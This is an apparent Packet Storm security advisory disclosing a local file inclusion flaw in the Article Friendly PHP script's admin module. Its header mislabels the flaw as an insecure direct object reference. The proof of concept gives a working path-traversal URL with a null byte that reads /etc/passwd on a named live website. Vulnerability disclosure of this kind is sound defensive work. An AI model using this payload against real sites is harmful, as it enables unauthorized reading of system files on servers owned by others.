Article Friendly suffers from a local file inclusion vulnerability.
bc6d96165ee0b4314aced6aba236f9bd3f29556c15be47378166e74df0c8237e =======================================================================
Article friendly Insecure direct object Referece Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Site p4ge http://www.articlefriendly.com/
# Plateform php
# Proof of concept #
Targeted URL: http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin
. .................................................................................................................
Exploit URL - http://www.familyfriendsphotos.com/admin/index.php?filename=../../../../../../../../../../etc/passwd%00
. .................................................................................................................
#If you have any questions, comments, or concerns, feel free to contact me.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed